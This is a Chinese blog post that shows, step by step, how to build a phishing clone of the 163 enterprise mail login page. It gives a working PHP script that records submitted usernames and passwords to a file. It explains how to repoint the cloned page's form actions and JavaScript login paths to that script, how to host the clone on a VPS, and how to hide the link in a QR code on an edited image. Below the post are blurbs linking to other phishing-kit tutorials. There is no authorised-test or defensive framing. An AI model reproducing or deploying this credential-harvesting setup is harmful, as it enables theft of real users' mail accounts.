钓鱼网站制作-克隆163企业邮箱

已于 2024-07-10 22:16:54 修改
阅读量483 收藏 9
点赞数 6
分类专栏: red 文章标签: 安全 web安全 网络安全
于 2024-07-10 22:15:12 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/bring_coco/article/details/140335112
版权

这里克隆163企业邮箱比较费劲,和之前的还不一样,这个克隆的目录比较多,发现好多工具都克隆不全,要不就是缺少图片要不就是缺少功能
首先效果
在这里插入图片描述

在这里插入图片描述
在这里插入图片描述
可以看到成功记录账户密码,接下来再来伪装到域名

这里克隆网站使用神器
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
会在My Web Sites目录下生成克隆的网站
整体克隆下的网站目录如下:在这里插入图片描述
在这里插入图片描述
可以看到打开网页相同,然后看看功能是否正常使用在这里插入图片描述
可以看到网页功能正常使用,当我们输入账户密码登录后会跳转到163邮箱

首先记录密码脚本如下:

<?php
if ($_SERVER['REQUEST_METHOD'] === 'POST') {
    $account_name = $_POST['account_name'];
    $password = $_POST['password'];

    // 检查用户名和密码是否合法,这里应该有相应的验证逻辑

    // 打开文件以追加写入
    $handle = fopen('result.txt', 'ab+');
    if ($handle) {
        $data = "account_name: $account_name - Password: $password\n";
        fwrite($handle, $data);
        fclose($handle);
    } else {
        echo "无法打开文件 'result.txt' 进行写入。";
    }
} else {
    echo "非法访问。";
}
?>

参数是account_name和password,由网络请求包中获得
在这里插入图片描述
这里我们主要在意的点就是账户密码登录,既然登录功能可以正常使用,说明form表单是正常的,那么我们将form表单更改到我们的记录密码的login.php文件
那么需要改index.html中的form表单
整个克隆下来的文件中就两个index.html文件,一个在根目录下,一个在子目录mail.xxx.cn下
在这里插入图片描述

可以看到根目录下的没有form表单说明这里和我们捕获密码没关系,那么看代码,是主要跳到mail.xxx.cn/index.html,那么说明在mail.xxx.cn目录下
那么我们主要修改目录下的index.html
共三处form表单处在这里插入图片描述
可以看到action跳转到了https://mailh.qiye.163.com/login/domainEntLogin,那么我们将第一处的action改完login.php
在这里插入图片描述
修改第二处action如下在这里插入图片描述
在这里插入图片描述
第三处action如下在这里插入图片描述
可以看到不需要修改

这样就改完了,放到vps上访问发现输入账户密码后登录还是跳转到163主页,跳转的url仍然是/login/domainEntLogin路径,那么肯定有/login/domainEntLogin没改完的地方在这里插入图片描述
可以看到js中存在该路径在这里插入图片描述
在这里插入图片描述
共两处涉及login/domainEntLogin

修改如下:在这里插入图片描述
在这里插入图片描述
可以看到修改完成

之后发现还需要去掉script部分

<script type="text/javascript">
    window.myDomain = "wanlitire.cn";
    window.isCommonPage = false;
    if(window.myDomain == "qiye.163.com"){
    window.isCommonPage = true;
    }
</script>

再次访问网站输入账号密码登录在这里插入图片描述
在这里插入图片描述
可以看到成功抓到密码
这里有个问题就是但是跳转之后显示是这样的,所以很容易引起怀疑,之后修改吧,暂时我没想到好的方法,想到的一种思路是跳转到这个页面限制时间零点几秒之后跳转到163邮箱首页,之后修改

为了让链接更加隐藏,做成二维码的形式
使用草料二维码官网进行制作
https://cli.im/在这里插入图片描述
扫码后直接跳转网站

然后在网上随便找个图片
在这里插入图片描述
进行p图,修改文字和二维码
在这里插入图片描述
可以看到成品如上,还不错

番茄酱料
关注
专栏目录
163邮箱登陆
02-23
163邮箱是中国网易公司提供的一款免费电子邮箱服务,它以其稳定、安全、便捷的特点深受广大用户喜爱。本文将深入探讨163邮箱的登录过程、功能特点以及相关的使用技巧。 1. **登录过程** - **网页版登录**:用户...
生成克隆钓鱼网站与对win7进行后渗透操作
记录开发和安全学习过程中的点点滴滴
09-10 1211
本篇文章是对自己使用CS部署钓鱼网站和通过生成木马对win7进行后渗透操作的一次实战,通过实战来去熟悉一些渗透测试过程中会遇到的一些操作,为自己以后的学习打好基础,也能去了解更多其他方面的一些知识.本文章是继上次进行手机木马远控复现后,进行钓鱼网站的搭建和使用木马文件后渗透的实操,在进行实战过程中遇到过,无法打开CS工具,也遇到过生成的木马文件在root文件夹中无法取出,说到达自己还是实战经验不足,但自己总能在遇到问题后冷静分析,并自己主动去解决问题,我很庆幸自己有这个能力,自己喜欢去依赖他人去解决问题,虽
kali 克隆网站的制作(钓鱼网站)
Dhc15638305698的博客
11-08 1351
制作简单钓鱼网站
mip22 高级网络钓鱼工具 可克隆69个主流网站
dys的博客
11-15 951
mip22 高级网络钓鱼工具 可克隆69个主流网站
DNS欺骗并与Cobalt Strike结合构建钓鱼网站实验
Tranquillity
09-27 1028
0x01 实验准备 实验原理: DNS欺骗就是攻击者冒充域名服务器欺骗用户。 利用Cobalt Strike搭建“钓鱼”网站,ettercap工具实现DNS欺骗。在同一局域网内,目标用户访问http://www.icloud.com时,会解析到攻击者IP,即目标用户此时访问的是攻击者克隆的网站。 实验工具: ettercap Cobalt Strike 实验环境: 靶机(Windows) 攻击机(kali,IP:192.168.233.129)并与靶机处于互能ping通状态。 0x02 实验步骤
慢雾:NFT 项目 verb 钓鱼网站分析
Websec
06-07 427
1、参考链接 慢雾:NFT 项目 verb 钓鱼网站分析网站克隆机:一款开源且超好用的网站克隆机 HTTrack - 知乎By:耀&Lisa据慢雾区情报,发现 NFT 项目 verb 钓鱼网站如下:钓鱼网站 1:https://mint-here.xyz/verblabs.html钓鱼网站 2:https://verb-mint.netlify.app我们先来分析钓鱼网站 1:查看源代码,发现这个钓鱼网站直接使用 HTTrack 工具克隆http://opensea-live.com/limited-sal
计网大作业-Kali制作调用网站-详细
05-30
Kali Linux作为一个专门针对网络安全和渗透测试的操作系统,内置了大量的工具,包括用于制作钓鱼网站的工具。在制作钓鱼网站的过程中,Kali Linux提供了以下步骤: 1. **安装Kali Linux**:首先,需要从官方网站...
网站制作过程
05-11
"网站制作过程" 网站制作过程是指基于ASP.NET技术开发一个完整的新闻发布系统网站的步骤。该过程涉及到网站目录结构的设计、数据库字段的设计、导航方式的选择、页面风格的统一、开发方法的选择等多个方面。 在...
163邮箱上保并改密免费版
07-20
6. **防钓鱼设置**:教育用户识别和避免钓鱼邮件,163邮箱可能提供相关的安全提示和教育内容,帮助用户识别虚假链接和附件。 7. **隐私设置**:用户可以自定义邮件的隐私设置,例如是否显示已读回执,防止他人知道...
生成克隆钓鱼网站和生成木马进行后渗透操作
最新发布
weixin_57176859的博客
07-09 448
生成克隆钓鱼网站和生成木马进行后渗透操作
制作钓鱼网站(克隆网站)
热门推荐
墨痕诉清风的博客
01-24 2万+
克隆网站
社会工程学——setoolkit的简单使用(克隆钓鱼网站)
Lzcsfg的博客
04-11 1446
Social Engineer Toolkit(SET)是一个开源的社会工程学攻击工具包,旨在模拟和执行多种社会工程学攻击,例如钓鱼、恶意软件传播和其他形式的社会工程学攻击。需要注意的是该克隆默认设置只可获取到以username 和password为字段的表单的信息,各网站设计者用的不一样,需要进一步学习实现克隆并获取。下一步需要在网站上输入你的攻击机ip,即kali的IP即可进入克隆钓鱼网站,当别人输入账户密码或者注册时你的kali终端这就会获取到。
钓鱼网站制作 ---- Setoolkit 克隆web页面钓鱼
daibaohui的博客
02-09 4520
web页面钓鱼虽然是很久之前的技术了,但是一些新颖的想法加入其中使web钓鱼页面做得更加逼真的话,目标也很难辨别的。这个工具是用来生成钓鱼网站的,kali上已经集成了。 这里我用kali演示: 1、 选择第一项Social-Engineering Attacks (社会工程学攻击) 翻译: 2、接下来选择第二项Website Attack Vectors (网站攻击载体) 翻译: 3、第三项Credential Harvester Attack Method (凭证收割机攻击方法) ..
网络安全——钓鱼邮件和网站克隆
weixin_54055099的博客
09-03 1505
钓鱼邮件跟仿造网站
社会工程学工具集之钓鱼网站的制作
欢迎来到神林的博客
01-30 9255
kali系统自带一个工具集合,叫做Social-Engineer Toolkit  这个工具还是蛮强大的,本文我们就来介绍如何制作钓鱼网站(仅限内网),顺便讲解一下此工具的其他功能: 首先: 搜索直接打开它: 接下来就进入了选项: 1、社会工程学攻击 2、快速追踪测试 3、第三方模块 4、升级软件 5、升级配置 6、帮助 99、退出 我们是进行钓鱼网站的进行选择1:
信息收集——网站克隆钓鱼邮件
Gjqhs的博客
03-11 2424
普及网站克隆方法和邮件伪造原理和方法 网站克隆 复制目标网站前端信息 构建相似网页 获取用户登录数据 方法 cotaltstrike能够快速复制目标网站前端页面,并且复制相识度极高 cotaltstrike同时还可以在复制的网站中插入恶意代码,如果本地浏览器带有漏洞的用户,可以直接控制目标机器。 点击cobaltstrike主页面Attack->WebDrive-by->Clone File CloneURL:克隆目标网站的URL 主意问题:URL需要添加http协议和端口(80) L
简单的钓鱼网站制作
qq_45906009的博客
06-23 5918
今天早上闲来无事,在地铁上,想到学习一下钓鱼网站的制作,于是到公司就准备实操一下。于是乎 这篇文章诞生了 首先我们需要一台kali。 打开Social Engineering Tools 1.社会工程学攻击 2.快速追踪测试 3.第三方模块 4.升级软件 5.升级配置 6.帮助 我们选择第一个社会工程学攻击 1.鱼叉式网络攻击 2.网页攻击 3.传染媒介式 4.建立payload和generator 5.群发邮件攻击 6.Arduion 基础攻击 7.无线接入攻击 8.二维码攻击 9.powershe
关于钓鱼网站的实现原理与技术
MCool的专栏
01-26 1万+
最近闲的蛋疼~ 分析了一下钓鱼网站的原理与实现。 可选技术方案 1)域名蒙眼术; 2)dns支持; dns劫持的关键是拥有客户端操作系统的权限,比如给用户发一些病毒程序,安装浏览器插件这类来实现,这里主要讨论web技术。 蒙眼术,比如:www.taobao.com是淘宝的域名,那我可以申请买个域名:www.taobao.com.xx.cn (注意红色才是真正的域名),普通用户不
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值